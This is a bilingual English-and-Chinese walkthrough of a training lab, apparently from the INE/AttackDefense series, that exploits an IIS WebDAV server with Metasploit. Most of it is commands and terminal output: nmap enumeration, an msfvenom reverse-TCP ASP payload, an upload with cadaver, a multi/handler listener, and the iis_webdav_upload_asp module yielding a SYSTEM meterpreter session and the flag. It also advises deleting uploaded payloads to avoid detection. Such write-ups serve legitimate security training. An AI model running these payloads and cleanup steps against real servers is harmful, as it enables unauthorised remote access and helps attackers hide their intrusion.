Exploiting WebDAV With Metasploit
Demo: Exploiting WebDAV With Metasploit
1
Target IP Address: 10.2.30.233
1
nmap -sV -p 80 --script=http-enum 10.2.30.233
1
2
3
4
10.2.30.233/webdav
bob
password_123321
How we can obtain a meterpreter session or reverse shell on the target system with Metasploit.
Generating the ASP payload ourselves with msfvenom.
Msfvenom is a tool that allows you to generate payload that provide you with reverse shell and remote access to the target system. In this case we are going to obtain a Meterpreter session which is advanced reverse shell that allows us to perform additional functionality like upload files, download files from the target, etc.
In order to generate the ASP payload:
-p: payload, using windows/meterpreter/reverse_tcp, this is a staged payload.
LHOST: provide our IP address. ifconfig. The IP the payload is going to connect to when it is executed.
LPORT: The port the payload is going to connect to.
-f: file format.
1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.5.2 LPORT=1234 -f asp > shell.asp
That is generated successfully, which is set the architecture to x32 bit. It is always recommanded to use 32 bit meterpreter payload here primarily because if you not family or not sure what architecture the target operating system is, x32 bit will work either wether the system is x32 bit or x64 bit.
1
2
3
ls
shell.asp
1
2
3
4
cadaver http://10.2.30.233/webdav
dav:/webdav/> ls
dav:/webdav/> put /root/shell.asp
在浏览器中刷新,可以看到shell.asp。
The next step will be click on it and execute it, but before we execute it, we need to set up a listener or and a handler that will receive the reverse connection from the target system and then send the stage that will provide us with a meterpreter session when executed.
In order to do this, we need to start up a metasploit console session, and in order to do this, we just start up the postgresql database service because the metasploit console require the metasploit framework database to be start.
1
service postgresql start && msfconsole
In order to set up the handler:
1
msf6 > use multi/handler
This is a metasploit mode which is used to set up a listener for the malicious payload you have created.
The payload we used to generate the malicious ASP file was:
1
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
This has to be same payload that you have specified when generating ASP file with msfvenom. Make sure the payload you specified is the same one you used to generated ASP file.
Remember they are the same option used when you are generating a malicious ASP payload with msfvenom.
run That is going to start up a listener or rather a reverse TCP handler and its now going to wait for a connection from the ASP payload we generated. So when we execute on the target, it will connect back to this particular reverse TCP handler.
1
2
3
4
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set LHOST 10.10.5.2
msf6 exploit(multi/handler) > set LPORT 1234
msf6 exploit(multi/handler) > run
So in order to execute it, we head back to /webdav/ directory and click on the shell.asp. It has been executed.
If you go back to terminal, you can see it is going to sending stage and it tells us meterpreter session 1 opened, and we have successfully gain the access to the target system.
1
meterpreter > sysinfo
Get our current privileges:
1
2
3
meterpreter > getuid
meterpreter > exit
msf6 exploit(multi/handler) > sessions
This is one of the technique that you can utilize go through the process of generating payload, manually uploading it using cadaver.
There is another techniques you can utilize, this technique essentially envolve utilizing a metasploit framework model, this model allows us to automate this entire process.
This allows us to upload a malicious or a meterpreter ASP file, that will provide us with meterpreter session onto the webdav server automatically.
Microsoft IIS WebDAV Write Access Code Execution
Microsoft IIS WebDAV 写访问代码执行
此模块可用于在具有全局可写目录的 IIS 服务器上执行有效负载。有效负载通过 WebDAV PUT 请求作为 ASP 脚本上传。目标 IIS 机器必须满足以下条件才能被视为可利用:它允许“脚本资源访问”、读取和写入权限,并支持 ASP。
It is going to start reverse tcp handler, it is going to check webdav. In this case is generating a new ASP file that will then be uploaded to the target, it’s then going to authenticate, and once it authenticate successfully, it is then going to upload the asp payload, and it then rename it to the ASP file, it then execute the ASP payload, and it also delete the metasploit ASP payload for you in order to avoid detection, so you can see it sends the stage, and get a meterpreter session.
1
2
3
4
5
6
7
8
9
10
msf6 exploit(multi/handler) > search iis upload
msf6 exploit(multi/handler) > use exploit/windows/iis/iis_webdav_upload_asp
msf6 exploit(windows/iis/iis_webdav_upload_asp) > show options
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set HttpUsername bob
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set HttpPassword password_123321
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set RHOSTS 10.2.30.233
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set PATH /webdav/metasploit.asp
msf6 exploit(windows/iis/iis_webdav_upload_asp) > exploit
meterpreter > sysinfo
meterpreter > getuid
If you head into webdav, you can it actually delete the ASP payload generated.
1
10.2.30.233/webdav/
You can also delete using the cadava utility, where we can delete the shell.asp file that we’ve uploaded manually.
1
2
3
dav:/webdav/> help
dav:/webdav/> delete shell.asp
dav:/webdav/> ls
That is something recommended. Once you gain access to the target system, delete any of the payloads or exploited files that you uploaded onto the target because that is something that is essaily to be detected.
1
2
3
4
5
6
7
8
9
10
11
12
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
AttackDefense.txt 49 Jan 4 2021
shell.asp 38437 Sep 11 17:14
web.config 168 Jan 4 2021
dav:/webdav/> delete shell.asp
Deleting `shell.asp': succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
AttackDefense.txt 49 Jan 4 2021
web.config 168 Jan 4 2021
Windows: IIS Server: WebDav Metasploit(Windows:IIS 服务器:WebDav Metasploit)
概述
为您提供了 Kali GUI 机器和易受攻击的目标机器。目标机器的 IP 地址在 Kali 机器桌面 (/root/Desktop/target) 上名为 target 的文本文件中提供。
你的任务是使用 Kali 机器上可用的工具对服务进行指纹识别,并使用 Metasploit 来利用它。
目标:利用服务并检索标志!
以下用户名和密码可用于访问服务:
| Username | Password |
|---|---|
| bob | password_123321 |
说明:
- 你的 Kali 机器有一个 IP 地址为 10.10.X.Y 的接口 运行 “ip addr” 可以知道 X 和 Y 的值。
- 目标机器的 IP 地址在文件 “/root/Desktop/target” 中提到* 不要攻击位于 IP 地址 192.V.W1 和 10.10.X.1 的网关
我自己的思路
1
Target IP Address : 10.0.20.119
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@attackdefense:~# nmap -sV -p 80 --script=http-enum 10.0.20.119
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-11 14:15 IST
Nmap scan report for 10.0.20.119
Host is up (0.0037s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-enum:
|_ /webdav/: Potentially interesting folder (401 Unauthorized)
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.94 seconds
1
2
3
4
http://10.0.20.119/webdav/
bob
password_123321
我们如何使用 Metasploit 在目标系统上获取 Meterpreter 会话或反向 shell。
使用 msfvenom 自己生成 ASP 有效负载。
Msfvenom 是一个工具,它允许您生成有效负载,为您提供反向 shell 和对目标系统的远程访问。在这种情况下,我们将获得一个 Meterpreter 会话,它是高级反向 shell,允许我们执行附加功能,例如上传文件、从目标下载文件等。
为了生成 ASP 有效负载:
-p:payload,使用windows/meterpreter/reverse_tcp,这是一个staged payload。
LHOST:提供我们的 IP 地址。 ifconfig。有效负载在执行时将连接到的 IP。
LPORT:有效负载要连接的端口。
-f:文件格式。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.1.0.38 netmask 255.255.0.0 broadcast 10.1.255.255
ether 02:42:0a:01:00:26 txqueuelen 0 (Ethernet)
RX packets 22326 bytes 1742578 (1.6 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18859 bytes 5174513 (4.9 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.21.3 netmask 255.255.255.0 broadcast 10.10.21.255
ether 02:42:0a:0a:15:03 txqueuelen 0 (Ethernet)
RX packets 5751 bytes 2519693 (2.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7852 bytes 847246 (827.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 119486 bytes 114743248 (109.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 119486 bytes 114743248 (109.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@kali:~# msfvenom -h
错误:MsfVenom - Metasploit 独立有效负载生成器。
也是 msfpayload 和 msfencode 的替代品。
用法:/usr/bin/msfvenom [选项]
选项:
-p, --payload 要使用的有效负载。指定“-”或标准输入以使用自定义有效负载
--payload-options 列出有效负载的标准选项
-l, --list [type] 列出模块类型。选项有:payloads、encoders、nops、all
-n, --nopsled 在有效负载上添加一个 [length] 大小的 nopsled
-f, --format 输出格式(使用 --help-formats 作为列表)
--help-formats 列出可用格式
-e, --encoder 要使用的编码器
-a, --arch 要使用的架构
--platform 有效负载的平台
--help-platforms 列出可用平台
-s, --space 生成的有效负载的最大大小
--encoder-space 编码有效载荷的最大大小(默认为 -s 值)
-b, --bad-chars 要避免的字符列表例如:'\x00\xff'
-i, --iterations 对有效载荷进行编码的次数
-c, --add-code 指定要包含的附加 win32 shellcode 文件
-x, --template 指定一个自定义的可执行文件作为模板使用
-k, --keep 保留模板行为并将有效负载作为新线程注入
-o, --out 保存有效载荷
-v, --var-name 指定用于某些输出格式的自定义变量名称
--smallest 生成尽可能小的有效载荷
-h, --help 显示此消息
生成成功,将架构设置为 x32 位。始终建议在此处使用 32 位 Meterpreter 有效负载,主要是因为如果您不熟悉或不确定目标操作系统是什么架构,则无论系统是 x32 位还是 x64 位,x32 位都可以工作。
1
2
3
4
5
6
7
root@attackdefense:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.21.3 LPORT=1234 -f asp -o shell.asp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of asp file: 38254 bytes
Saved as: shell.asp
1
2
3
4
root@attackdefense:~# ls
Desktop impacket shell.asp thinclient_drives
root@attackdefense:~# pwd
/root
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@attackdefense:~# cadaver http://10.0.20.119/webdav/
Authentication required for 10.0.20.119 on server `10.0.20.119':
Username: bob
Password:
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
AttackDefense.txt 49 Jan 4 2021
web.config 168 Jan 4 2021
dav:/webdav/> put /root/shell.asp
Uploading /root/shell.asp to `/webdav/shell.asp':
Progress: [=============================>] 100.0% of 38254 bytes succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
AttackDefense.txt 49 Jan 4 2021
shell.asp 38254 Sep 11 14:47
web.config 168 Jan 4 2021
下一步将点击它并执行它,但在我们执行它之前,我们需要设置一个侦听器或一个处理程序,它将接收来自目标系统的反向连接,然后发送将为我们提供的阶段执行时的meterpreter会话。
为此,我们需要启动一个 metasploit 控制台会话,为此,我们只需启动 postgresql 数据库服务,因为 metasploit 控制台需要启动 metasploit 框架数据库。
1
root@attackdefense:~# service postgresql start && msfconsole
为了设置处理程序:
1
2
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
这是一种 metasploit 模式,用于为您创建的恶意负载设置侦听器。
我们用来生成恶意 ASP 文件的有效载荷是:
1
windows/meterpreter/reverse_tcp
1
2
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
这必须与您在使用 msfvenom 生成 ASP 文件时指定的有效负载相同。确保您指定的有效负载与您用于生成 ASP 文件的有效负载相同。
请记住,它们与使用 msfvenom 生成恶意 ASP 有效负载时使用的选项相同。
run 这将启动一个侦听器,或者更确切地说是一个反向 TCP 处理程序,它现在将等待来自我们生成的 ASP 有效负载的连接。因此,当我们在目标上执行时,它将连接回这个特定的反向 TCP 处理程序。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 10.10.21.3
LHOST => 10.10.21.3
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.21.3:1234
所以为了执行它,我们回到/webdav/目录并点击shell.asp。它已被执行。
如果你回到终端,你可以看到它正在进入发送阶段,它告诉我们meterpreter session 1 已打开,我们已成功获得对目标系统的访问权限。
获取我们当前的特权:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
meterpreter > sysinfo
Computer : AD-IIS
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.0.20.119 - Meterpreter session 1 closed. Reason: Died
msf6 exploit(multi/handler) > sessions
Active sessions
===============
No active sessions.
这是您可以利用的技术之一,通过生成有效负载的过程,使用cadaver手动上传。
您可以使用另一种技术,该技术本质上涉及使用 metasploit 框架模型,该模型使我们能够自动化整个过程。
这允许我们上传恶意或meterpreter ASP 文件,这将自动为我们提供meterpreter 会话到webdav 服务器。
Microsoft IIS WebDAV Write Access Code Execution
This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request. The target IIS machine must meet these conditions to be considered as exploitable: It allows ‘Script resource access’, Read and Write permission, and supports ASP.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@attackdefense:~# msfconsole -q
msf6 > search iis upload
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/scada/advantech_webaccess_dashboard_file_upload 2016-02-05 excellent Yes Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload
1 exploit/windows/iis/iis_webdav_upload_asp 2004-12-31 excellent No Microsoft IIS WebDAV Write Access Code Execution
2 exploit/windows/http/umbraco_upload_aspx 2012-06-28 excellent No Umbraco CMS Remote Command Execution
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/http/umbraco_upload_aspx
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
msf6 exploit(multi/handler) > use exploit/windows/iis/iis_webdav_upload_asp
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_upload_asp) > show options
Module options (exploit/windows/iis/iis_webdav_upload_asp):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The HTTP password to specify for authentication
HttpUsername no The HTTP username to specify for authentication
METHOD move yes Move or copy the file on the remote system from .txt -> .asp (Accepted: move, copy)
PATH /metasploit%RAND%.asp yes The path to attempt to upload
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.21.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set HttpUsername bob
HttpUsername => bob
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set HttpPassword password_123321
HttpPassword => password_123321
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set PATH /webdav/metasploit%RAND%.asp
PATH => /webdav/metasploit%RAND%.asp
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set RHOSTS 10.0.23.9
RHOSTS => 10.0.23.9
msf6 exploit(windows/iis/iis_webdav_upload_asp) > exploit
[*] Started reverse TCP handler on 10.10.21.3:4444
[*] Checking /webdav/metasploit107509300.asp
[*] Uploading 609508 bytes to /webdav/metasploit107509300.txt...
[*] Moving /webdav/metasploit107509300.txt to /webdav/metasploit107509300.asp...
[*] Executing /webdav/metasploit107509300.asp...
[*] Sending stage (175174 bytes) to 10.0.23.9
[*] Deleting /webdav/metasploit107509300.asp (this doesn't always work)...
[*] Meterpreter session 2 opened (10.10.21.3:4444 -> 10.0.23.9:49805) at 2022-09-11 17:00:46 +0530
meterpreter > sysinfo
Computer : AD-IIS
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > search -f flag*
Found 1 result...
c:\flag.txt (32 bytes)
meterpreter > cat c:\\flag.txt
d3aff16a801b4b7d36b4da1094bee345
这是推荐的东西。一旦您获得对目标系统的访问权限,请删除您上传到目标上的任何有效负载或被利用的文件,因为这很容易被检测到。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
AttackDefense.txt 49 Jan 4 2021
shell.asp 38556 Sep 11 16:44
web.config 168 Jan 4 2021
dav:/webdav/> help
Available commands:
ls cd pwd put get mget mput
edit less mkcol cat delete rmcol copy
move lock unlock discover steal showlocks version
checkin checkout uncheckout history label propnames chexec
propget propdel propset search set open close
echo quit unset lcd lls lpwd logout
help describe about
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/webdav/> delete shell.asp
Deleting `shell.asp': succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
AttackDefense.txt 49 Jan 4 2021
web.config 168 Jan 4 2021
解决方案
此实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-2319.pdf
Microsoft IIS WebDAV Write Access Code Execution
